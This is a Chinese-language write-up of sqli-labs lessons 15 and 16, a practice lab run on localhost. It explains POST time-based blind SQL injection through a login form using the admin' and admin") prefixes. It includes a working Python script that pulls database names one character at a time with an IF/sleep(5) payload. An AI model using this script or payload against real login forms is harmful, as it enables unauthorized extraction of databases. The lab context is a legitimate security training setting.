less 15
post方法单引号时间盲注
这关跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]'
所以只要构造uname=admin'绕过就行了
贴个爆数据库的脚本,其他的改下sql语句就能用了
#coding:utf-8
import requests,datetime
url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-15/"
char = "abcdefghijklmnopqrstuvwxyz_"
print("start!")
for i in range(0,10):
database = ""
for j in range(1,20):
for str in char:
# print(str)
time1 = datetime.datetime.now()
data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(5))#"%(i,j,str),'passwd':"1"}
res = requests.post(url,data=data)
# print(res.text)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec<4:
database += str
print(database)
break
print("the %d database: "%i)
print(database)
print("end!")
最后出来是这样的,不过这个脚本跑的是真的就,每个包都要等5秒.......
less 16
post方法双引号括号绕过时间盲注
这关跟上一关基本是相同的,后台语句改了一点,select xxx from "table_name" where uname=("$_POST["uname"]") and passwd=("$_POST["passwd"]")
所以只要构造uname=admin")绕过就行了
上面的脚本稍微改一下,还是能继续用的